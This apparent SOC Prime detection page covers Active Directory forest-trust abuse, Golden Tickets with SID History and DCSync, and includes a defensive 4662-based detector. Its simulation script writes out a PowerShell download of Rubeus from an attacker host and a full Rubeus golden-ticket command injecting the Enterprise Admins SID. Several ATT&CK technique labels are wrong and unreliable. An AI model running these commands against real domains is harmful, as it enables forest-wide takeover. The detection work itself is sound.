SOC Prime Bias: Critical

01 Jul 2026 09:11 UTC

Active Directory Forest Trust Abuse and Child-to-Root Escalation

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

This technical walkthrough shows how an attacker with Domain Admin privileges in a child domain can escalate to administrative control of the Forest Root. The attack abuses bidirectional intra-forest trusts and permissive SID filtering to inject Enterprise Admin SIDs into forged Kerberos tickets. It also explains how coercion methods such as PetitPotam can be leveraged to capture machine account tickets and enable DCSync attacks.

Investigation

The report describes a lab-based engagement in which the attacker begins in the pentest.ignite.local child domain. The workflow includes enumerating forest trusts, extracting the krbtgt hash, forging a Golden Ticket with SID History, and executing a DCSync attack against the parent ignite.local domain. A secondary escalation path using the PetitPotam coercion technique is also demonstrated.

Mitigation

Recommended mitigations include treating all domain controllers as tier-zero assets and rotating the krbtgt password twice on a regular basis across the forest. Organizations should enforce SID filtering on trusts, disable unconstrained delegation, and turn off the Print Spooler service on domain controllers. Additional hardening steps include using the Protected Users group for Kerberos protection and monitoring for abnormal DRSUAPI replication activity.
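The last mitigation, monitoring for abnormal DRSUAPI replication, can be checked against Windows Security Event ID 4662, which records the replication control-access rights a principal requested. The following Python is an added example, not code from SOC Prime or from the report it summarises; the DC names, addresses and events are constructed, and the SourceAddress field is assumed to have been enriched from the subject's logon session, since 4662 itself carries no network address. It covers both paths on this page: a user principal replicating (Golden Ticket) and a DC machine account replicating from a host that is not that DC (captured machine ticket).

```python
import re
# GUIDs of the control-access rights requested during directory replication; they appear in
# the Properties field of Windows Security Event ID 4662 when an object is read via DRSUAPI.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed baseline (hypothetical names and addresses): DC machine account -> DC address.
# In production this comes from the DC inventory, never from the logs being analysed.
KNOWN_DCS = {"PENTEST-DC$": "10.10.1.10", "IGNITE-DC$": "10.10.0.10"}

def detect_dcsync(events, known_dcs=KNOWN_DCS):
    """Return (subject, reason) for every 4662 event that looks like DCSync replication.
    SourceAddress is assumed to be enriched from the subject's logon session (4624/4768
    correlation); 4662 itself records no network address."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(ev["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights:
            continue  # ordinary object access, not replication
        subject = ev["SubjectUserName"]
        if subject not in known_dcs:
            # Golden Ticket / pass-the-ticket path: a user principal pulling NTDS secrets.
            findings.append((subject, "non-DC principal requested " + ", ".join(rights)))
        elif ev.get("SourceAddress") not in (None, known_dcs[subject]):
            # Coercion path: a captured DC machine-account ticket replayed from another host.
            findings.append((subject, "DC account replicating from " + ev["SourceAddress"]))
    return findings

# Constructed sample telemetry, not real logs.
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "PENTEST-DC$", "SourceAddress": "10.10.1.10",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "administrator", "SourceAddress": "10.10.1.55",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "IGNITE-DC$", "SourceAddress": "10.10.1.55",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SourceAddress": "10.10.1.20",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # schema-class GUID: plain read
]

def run_sample():
    return detect_dcsync(SAMPLE_4662)
```

Accounts that legitimately replicate without being domain controllers, such as the Azure AD Connect MSOL_ account, must be added to the baseline or they will surface as non-DC principals.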

Response

If DCSync activity or unauthorized Kerberos ticket use is detected, responders should immediately isolate impacted domain controllers and begin a double krbtgt password reset. All accounts with Enterprise Admin privileges should be investigated, and the environment should be checked for tools such as Rubeus or PetitPotam. Authentication logs should also be reviewed for unusual machine account behavior and possible coercion-related events.

Attack Flow

    flowchart TD
        step_persistence_foothold["Persistence & Foothold: Create new user and add to Domain Admins (net user /add, net group /add)"]
        step_discovery["T1087 – Account Discovery: Map forest structure and trust relationships (nltest, bloodyAD)"]
        rules_for_discovery("<b>Rule Name</b>: Probable Use of Windows Hacktools [Part3] (via file_event)<br/><b>Rule ID</b>: 804c1bdd-1345-4557-975e-8e5c4ca71745")
        step_credential_access_ntds["T1003 – OS Credential Dumping: Extract child domain krbtgt hash (nxc smb --ntds)"]
        rules_for_credential_access("<b>Rule Name</b>: Probable Use of Windows Hacktools [Part3] (via file_event)<br/><b>Rule ID</b>: 804c1bdd-1345-4557-975e-8e5c4ca71745")
        step_golden_ticket["T1558.003 – Steal or Forge Kerberos Tickets: Golden Ticket with Enterprise Admins SID (Rubeus.exe)"]
        step_lateral_movement["T1550 – Use Alternate Authentication Material: Pass the Ticket to forest root (Rubeus.exe ptt)"]
        step_dcsync_root["T1003 – OS Credential Dumping: DCSync forest root NTDS.DIT (impacket-secretsdump)"]
        step_coercion_petitpotam{"T1556 – Modify Authentication Process: PetitPotam coercion (PetitPotam.py)"}
        step_capture_machine_ticket["T1558 – Steal or Forge Kerberos Tickets: Capture forest root machine account ticket (Rubeus.exe monitor)"]
        step_dcsync_coercion["T1003 – OS Credential Dumping: DCSync using captured machine ticket (impacket-secretsdump)"]

        step_persistence_foothold -->|leads_to| step_discovery
        step_discovery -->|leads_to| step_credential_access_ntds
        step_credential_access_ntds -->|leads_to| step_golden_ticket
        step_golden_ticket -->|leads_to| step_lateral_movement
        step_lateral_movement -->|leads_to| step_dcsync_root
        step_dcsync_root -->|alternative_path| step_coercion_petitpotam
        step_coercion_petitpotam -->|leads_to| step_capture_machine_ticket
        step_capture_machine_ticket -->|leads_to| step_dcsync_coercion

        step_discovery -.->|detected_by| rules_for_discovery
        step_credential_access_ntds -.->|detected_by| rules_for_credential_access
        step_dcsync_root -.->|detected_by| rules_for_credential_access
        step_dcsync_coercion -.->|detected_by| rules_for_credential_access

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has gained a foothold in a child domain (pentest.ignite.local). To escalate to the forest root, they first use nxc (NetExec) to list Domain Controllers via LDAP and map the target environment. Next, they use PowerShell to download Rubeus.exe from a remote attacker-controlled server. Finally, they execute Rubeus.exe to forge a Golden Ticket. The forged ticket contains the SID of the forest root domain (S-1-5-21-2964257136-1039789743-457275023) so that the adversary is treated as a forest administrator when interacting with the root domain.

  • Regression Test Script:

    # Simulation of Forest Trust Abuse to trigger the specific Sigma rule
    
    # 1. Simulate NetExec LDAP Enumeration
    # Note: We call 'nxc' via a dummy execution to mimic the command line signature
    Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow
    
    # 2. Simulate Rubeus Download via PowerShell
    # This matches the exact string: 'powershell wget http://Rubeus.exe -o Rubeus.exe'
    Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow
    
    # 3. Simulate Rubeus Golden Ticket Forgery
    # This matches the exact complex string required by the detection rule
    $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket"
    Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow

  • Cleanup Commands:

    # Remove the downloaded Rubeus file and any dummy artifacts
    Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "ticket" -ErrorAction SilentlyContinue